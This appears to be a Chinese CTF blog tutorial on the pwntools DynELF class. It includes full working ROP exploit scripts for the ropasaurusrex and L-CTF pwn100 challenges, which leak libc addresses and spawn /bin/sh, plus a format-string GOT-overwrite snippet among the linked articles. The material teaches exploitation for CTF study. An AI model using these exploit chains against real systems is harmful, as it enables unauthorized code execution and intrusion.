DynELF

最新推荐文章于 2021-06-22 11:11:48 发布
最新推荐文章于 2021-06-22 11:11:48 发布
阅读量6.1k 收藏 24
点赞数 4
分类专栏: CTF Pwn 文章标签: 安全
钞sir
本文链接:https://blog.csdn.net/qq_40827990/article/details/86689760
版权
Pwn 同时被 2 个专栏收录
28 篇文章 8 订阅
订阅专栏
CTF
22 篇文章 4 订阅
订阅专栏

我用三生的期许 换回三世相思雨
三千浮沉里的你 迷失轮回的自己
https://cc-sir.github.io/2019/01/29/dynelf/

简介

对于不同版本的libc,函数首地址相对于文件开头的偏移和函数间的偏移不一定一致;如果题目不提供libc,我们通过泄露任意一个库函数地址计算出system函数地址的方法可能就不太方便了,所以这就要求我们想办法获取目标系统的libc
这里介绍一种远程获取libc的方法,叫做DynELF,这是pwntools在早期版本就提供了一个解决方案——DynELF类;
通俗地讲,DynELF就是通过程序漏洞泄露出任意地址内容,结合ELF文件的结构特征获取对应版本文件并计算对比出目标符号在内存中的地址

模板

p = remote(ip, port)
 
def leak(addr):
       payload2leak_addr =****+ pack(addr) +****”
       p.send(payload2leak_addr)
       data = p.recv()
       return data
 
d = DynELF(leak, pointer = pointer_into_ELF_file, elf = ELFObject)
system_addr = d.lookup('system', 'libc')
read_add = d.lookup('read','libc')

局限

使用DynELF时,我们需要使用一个leak函数作为必选参数,指向ELF文件的指针或者使用ELF类加载的目标文件至少提供一个作为可选参数,以初始化一个DynELF类的实例d。然后就可以通过这个实例d的方法lookup来搜寻libc库函数了;
其中,leak函数需要使用目标程序本身的漏洞泄露出由DynELF类传入的int型参数addr对应的内存地址中的数据。且由于DynELF会多次调用leak函数,这个函数必须能任意次使用,即不能泄露几个地址之后就导致程序崩溃。由于需要泄露数据,payload中必然包含着打印函数,如write, puts, printf等;
而通过实践发现write函数是最理想的,因为write函数的特点在于其输出完全由其参数size决定,只要目标地址可读,size填多少就输出多少,不会受到诸如‘\0’, ‘\n’之类的字符影响;而puts, printf函数会受到诸如‘\0’, ‘\n’之类的字符影响,在对数据的读取和处理有一定的难度

例子

我们以2013-PlaidCTF-ropasaurusrex这个实例来看看DynELF方法的使用,以及write函数在DynELF方法中的用法
我们先checksec检查其保护机制:

sir@sir-PC:/2013-PlaidCTF-ropasaurusrex$ checksec ropasaurusrex
[*] '/2013-PlaidCTF-ropasaurusrex/ropasaurusrex'
    Arch:     i386-32-little
    RELRO:    No RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)

现在我们看看write函数能不能在程序中实现任意地址的读取打印,通过测试我们可以知道栈溢出到EIP需要140个字节

Python 2.7.15 (default, May  1 2018, 05:55:50) 
[GCC 7.3.0] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> from pwn import *
>>> p = process('./ropasaurusrex')
[x] Starting local process './ropasaurusrex'
[+] Starting local process './ropasaurusrex': pid 21128
>>> elf = ELF('./ropasaurusrex')
[*] '/2013-PlaidCTF-ropasaurusrex/ropasaurusrex'
    Arch:     i386-32-little
    RELRO:    No RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)
>>> payload = 'a'*140 + p32(elf.plt['write']) + p32(0) + p32(1) + p32(0x8048000) + p32(8)
>>> p.sendline(payload)
>>> p.recv()
[*] Process './ropasaurusrex' stopped with exit code -11 (SIGSEGV) (pid 21128)
'\x7fELF\x01\x01\x01\x00' #这里很明显可以读取到0x8048000位置的内容
>>>

所以我们的leak函数可以这样写:

def leak(addr):
    payload = 'a'*140 + p32(elf.plt['write']) + p32(start_addr)
    payload+= p32(1) + p32(addr) + p32(8)
    p.sendline(payload)
    context = p.recv(8)
    print("%#x -> %s" %(addr, (context or '').encode('hex')))
    return context

因为程序当中没有"/bin/sh"字符串,所以我们不仅需要system函数泄露出来,还需要将read函数泄露出来,方便我们写入字符串

d = DynELF(leak,elf = elf)
system_addr = d.lookup('system','libc')
read_addr = d.lookup('read','libc')
print "system_addr: " + hex(system_addr)
print "read_addr: " + hex(read_addr)

EXP

所以exp就这样写:

from pwn import *
pro = './ropasaurusrex'
p = process(pro)
elf = ELF(pro)
start_addr = 0x8048340

def leak(addr):
    payload = 'a'*140 + p32(elf.plt['write']) + p32(start_addr)
    payload+= p32(1) + p32(addr) + p32(8)
    p.sendline(payload)
    context = p.recv(8)
    print("%#x -> %s" %(addr, (context or '').encode('hex')))
    return context
d = DynELF(leak,elf = elf)
system_addr = d.lookup('system','libc')
read_addr = d.lookup('read','libc')
print "system_addr: " + hex(system_addr)
print "read_addr: " + hex(read_addr)

p.sendline('a'*140 + p32(read_addr) + p32(system_addr) + p32(0) + p32(elf.bss()+100) + p32(8))
p.sendline('/bin/sh\x00')
p.interactive()

小结

DynELF泄露函数方法最方便的使用情况是程序中最好含有write函数等输出函数且可以多次反复调用,并且DynELF找的是字符串…

L-CTF-2016 pwn100

# -*- coding: utf-8 -*-
from pwn import *
context.log_level = 'debug'
context.terminal = ['deepin-terminal', '-x', 'sh' ,'-c']
name = './pwn1'
elf = ELF(name)
p = process(name)
#p = remote("111.198.29.45",30617)

if args.G:
    gdb.attach(p)

pop_ret = 0x0400763
def leak(addr):
    payload = 'a'*72 + p64(0x0400763) + p64(addr) + p64(elf.plt['puts']) + p64(0x40068e)
    payload += (200-len(payload)) * 'b'
    p.send(payload)
    p.recvuntil('bye~\n') 
    up = ""
    count = 0
    buf = ""
    while True:
        c = p.recv(numb=1, timeout=0.3)
        count += 1
        if up == '\n' and c == "":  
            buf = buf[:-1] + '\x00'
            break
        else:
            buf += c
            up = c
    data = buf[:4]  
    log.info("%#x => %s" % (addr, (data or '').encode('hex')))
    return data
  
d = DynELF(leak, elf = elf)
system_addr = d.lookup('system', 'libc')
success("system_addr: " + hex(system_addr))
payload = 'a'*72 + p64(0x0400763) + p64(8) + p64(0x0400761) + p64(elf.bss()+0x100) + p64(1) + p64(elf.plt['read']) + p64(0x40068e)
payload += (200-len(payload)) * 'b'
p.send(payload)
p.send("/bin/sh")

payload = 'q'*(72-7) + p64(0x0400763) + p64(elf.bss()+0x100) + p64(system_addr) + p64(0x40068e)
payload += (200-len(payload)) * 'b'
p.send(payload)
p.interactive()

PUTS函数

参考

puts输出完后就没有其他输出

def leak(address):
  count = 0
  data = ''
  payload = xxx
  p.send(payload)
  print p.recvuntil('xxx\n') #一定要在puts前释放完输出
  up = ""
  while True:
    c = p.recv(numb=1, timeout=1)
    count += 1
    if up == '\n' and c == "":  
      buf = buf[:-1]             
      buf += "\x00"
      break
    else:
      buf += c
    up = c
  data = buf[:4]  
  log.info("%#x => %s" % (address, (data or '').encode('hex')))
  return data

puts输出完后还有其他输出

def leak(address):
  count = 0
  data = ""
  payload = xxx
  p.send(payload)
  print p.recvuntil("xxx\n")) #一定要在puts前释放完输出
  up = ""
  while True:
    c = p.recv(1)
    count += 1
    if up == '\n' and c == "x":  #一定要找到泄漏信息的字符串特征
      data = buf[:-1]                     
      data += "\x00"
      break
    else:
      buf += c
    up = c
  data = buf[:4] 
  log.info("%#x => %s" % (address, (data or '').encode('hex')))
  return data

在信息泄露过程中,由于循环制造溢出,故可能会导致栈结构发生不可预料的变化,可以尝试调用目标二进制程序的_start函数来重新开始程序以恢复栈.

钞sir
关注
  • 4
    点赞
  • 24
    收藏
    觉得还不错? 一键收藏
  • 6
    评论
专栏目录
pwn libc之Dynelf工具
清霂的博客
04-02 445
目录pwn-100pwn-200welpwn Dynelf工具可以根据泄露出的地址找到相应libc版本的其他函数地址,但缺点时不能查找字符串也就是"/bin/sh"的地址,所以找到system函数后,往往还需要找到一个可写的地方用read函数读取"/bin/sh" pwn-100 #!/usr/bin/env python3 from pwn import * context(os="linux", arch="amd64", log_level="debug") contentt = 1 #elf e
HITCTF PWN300--dynelf
Vccxx的博客
04-08 990
第一次用Dynelf,脚本调了一下午。。hitctf pwn300题目链接:http://pan.baidu.com/s/1eSCCOE2漏洞分析:三个write之前的一个函数调用了read来读入字符,而这里存在明显的缓冲区溢出,可以覆盖main函数的栈地址,这个题没给libc,got表里没有system之类的函数,于是考虑用dynelf。攻击脚本:from pwn import * io = pr
DynELF的原理及应用
Sakura给爷pwn全场
03-29 566
Pwntools之DynELF原理探究: https://www.freebuf.com/articles/system/193646.html
DynELF和pwn200
weixin_44464829的博客
11-15 183
在做漏洞利用时,由于 ASLR 的影响,我们在获取某些函数地址的时候,需要一些特殊的操作。一种方法是先泄露出 libc.so 中的某个函数,然后根据函数之间的偏移,计算得到我们需要的函数地址,这种方法的局限性在于我们需要能找到和目标服务器上一样的 libc.so,而有些特殊情况下往往并不能找到。而另一种方法,利用如 pwntools 的 DynELF 模块,对内存进行搜索,直接得到我们需要的函数地址。 DynELF是pwntools中专门用来应对无libc情况的漏洞利用模块,其基本代码框架如下。 p.
csapplab:学习csapp
04-04
然后这周还是将重点放在了ctf上,不过效率还挺高的,嘿嘿,学了泄露libc的一个工具Dynelf,堆的fastbin attack的一部分(大致了解了相关概念(fastbin,smallbin,largebin)的结构和malloc,free的过程),还学了...
[pwn基础]Pwntools学习.doc
07-10
例如,`adb` 可用于 Android 设备管理,`asm` 提供汇编和反汇编功能,`context` 设置运行环境,`dynelf` 用于远程解析函数,`encoders` 对 shellcode 进行编码,`elf` 处理 ELF 文件,`fmtstr` 用于格式化字符串漏洞...
pwn100题目文件及exp.zip
08-09
DynELF是一个技术,用于动态地获取并利用ELF(Executable and Linkable Format)文件中的函数地址。在没有`system`的情况下,攻击者通常会寻找其他可执行代码的入口点,或者利用已知的函数地址来实现ROP(Return-...
Pwn-栈溢出之DynELF
CharlesGodX的博客
03-08 887
0x00:前言 DynELF方法适用于没有libc的情况,我们可以通过DynELF方法来实现泄露system函数的地址,那么DynELF是什么呢?在pwntools官方文档有介绍,简单而言就是通过leak方法反复进入main函数中查询libc中的内容,其代码框架如下 p = process('./xxx') def leak(address): payload = "xxxxxxxx" + a...
pwntools库DynELF函数使用小结
PLpa的博客
09-01 1674
DynELF函数 0x00.前言 当我们在使用ROP做题目的时候,发现题目并没有给出libc.so文件(或者libc.so直接给错),这就让一部分人犯了难,这个问题怎么解决嘞?这里,我们介绍一种不需要给出libc.so实体文件,我们直接从库里匹配libc.so的方法——pwntools中的DynELF函数。 0x01.使用条件 既然我们要使用这个函数,我们就必须知道这个函数使用起来要什么条件。 要...
一键搭建pwn环境脚本
03-25
一键搭建pwn环境脚本,安装pwntools, libc-database,vim, ropper, ROPgadget,libc-debug,ssh, one_gadget, pwndbg + pwngdb, 。其中pwntools为python3库 使用方法: chmod +x init_pwn.sh ./init_pwn.sh
pwntools中DynELF使用
weixin_41038905的博客
04-19 856
DynELF是pwntools中专门用来应对没有libc情况的漏洞利用模块,在提供一个目标程序任意地址内存泄漏函数的情况下,可以解析任意加载库的任意符号地址。 libc是Linux下的ANSI C的函数库。ANSI C是基本的C语言函数库,包含了C语言最基本的库函数。 本文exp以攻防世界中的pwn-100为例 from pwn import * p = process('./pwn-100...
DynELF模块和通用gadget实现libc通杀(详细注释)
weixin_48066554的博客
06-22 473
DynELF模块和通用gadget实现libc通杀(详细注释) 文章目录用DynELF模块和通用gadget实现libc通杀(详细注释)泄露libc版本方式x86版本x64版本万能gadgetret2libcx86版本x64版本 泄露libc版本方式 主要原理:利用栈溢出等写入栈的手段调用write或者puts函数,并控制write或puts函数参数泄露libc函数真实地址 write函数特点:可以控制大小,但是在64位程序中需要使用gadget进行寄存器传参,有时可能碰不到合适gadget puts函
64位下pwntools中dynELF函数的使用
weixin_30362233的博客
12-07 375
这几天有同学问我在64位下怎么用这个函数,于是针对同一道题写了个利用dynELF的方法 编译好的程序http://pan.baidu.com/s/1jImF95O 源码在后面 from pwn import * elf = ELF('./pwn_final') got_write = elf.got['write'] print 'got_write= ' + ...
pwn 练习笔记 暑假第八天 DynELF模块
SsMing的博客
07-20 1891
继续昨天的未解之谜,leve4 在第二次感受火狐崩溃带来的绝望之后,在此立誓,再也不用火狐写博客 IDA打开查看一下伪代码: 图没截全,罢啦罢啦!那vul函数就看汇编吧 可看出,我们输入的字符串与ebp距离为0x88 checksec查看,开了nx保护 ROPgadget查看,没有‘/bin/sh’ DynELF是pwntools中专门用来应对无libc情况的漏洞利用模块...
DynELF使用小结
ATFWUS的博客
03-12 5973
0x01.感悟 DynELF对于没有libc的题来说,真的非常好用,可以得到system的地址,比面对几十上百种libc可能的LibcSearcher简直不要太好用,真的是一个好工具!!! 0x02.注意事项 DynELF的使用,也需要注意一些限制条件和具体的使用范围: DynELF的原理是在内存中不断搜索地址信息,所以漏洞一定要可以反复的被利用。 因为需要输出地址,所以一定需要相关的相...
ROP实例分析(二)---------------------------DynELF使用
iDevil7的博客
07-13 681
DynELF是pwntools中专门用来应对没有libc情况的漏洞利用模块,其基本代码框架如下。需要使用者进行的工作主要集中在leak函数的具体实现上,上面的代码只是个模板。其中,address就是leak函数要泄漏信息的起始地址,而payload就是触发目标程序泄漏address处信息的攻击代码。A.使用条件不管有没有libc文件,要想获得目标系统的system函数地址,首先都要求目标二进制程序...
借助DynELF实现无libc的漏洞利用小结
_wells的博客
03-30 3320
转自:http://bobao.360.cn/learning/detail/3298.html    前言 在没有目标系统libc文件的情况下,我们可以使用pwntools的DynELF模块来泄漏地址信息,从而获取到shell。本文针对linux下的puts和write,分别给出了实现DynELF关键函数leak的方法,并通过3道CTF题目介绍了这些方法的
查找函数的加载地址及DynELF利用
qq_43390703的博客
03-23 793
查找函数的加载地址 指针 寻找函数地址的典型方法是通过计算我们泄漏的同一个库中另一个函数的地址到所需函数的偏移量。但是,要使此方法有效工作,glibc的远程服务器版本需要与我们的版本相同。我们也可以通过泄漏一些函数并在libcdb.com中搜索来找到glibc的远程版本,但是有时这个方法会失败。 DynELF 如果我们有一个函数允许我们在任何给定的地址泄漏内存,我们可以使用类似DynELF使用pw...
字符串拼接实现pwn
最新发布
12-03
字符串拼接在pwn中是非常常见的,可以用于构造payload,实现漏洞利用。下面是一个简单的例子,演示了如何使用字符串拼接实现pwn: 假设有一个程序存在格式化字符串漏洞,我们需要构造一个payload来执行system("/bin/sh")。首先,我们需要获取system函数的地址,可以使用pwntools中的DynELF模块来实现: ```python from pwn import * p = process("./vuln") # 启动程序 elf = ELF("./vuln") # 加载程序 # 获取system函数的地址 system_addr = elf.sym["system"] ``` 接下来,我们需要构造payload。由于格式化字符串漏洞是通过将格式化字符串作为参数传递给函数来触发的,因此我们需要构造一个包含system函数地址的格式化字符串。具体来说,我们可以使用"%n$"来引用参数列表中的第n个参数,从而实现读取任意地址的数据。例如,"%12$n"表示将当前已经输出的字符数写入参数列表中的第12个参数所指向的地址中。 ```python # 构造payload payload = p32(elf.got["printf"]) # 将printf的GOT地址作为第一个参数 payload += "%{}x%12$hn".format(system_addr & 0xffff) # 将system地址的低16位写入printf的GOT地址 payload += "%{}x%13$hn".format((system_addr >> 16) & 0xffff - (system_addr & 0xffff)) # 将system地址的高16位写入printf的GOT地址+2 ``` 最后,我们只需要将payload发送给程序即可: ```python # 发送payload p.sendline(payload) p.interactive() # 进入交互模式,可以手动输入命令 ```

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 6
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值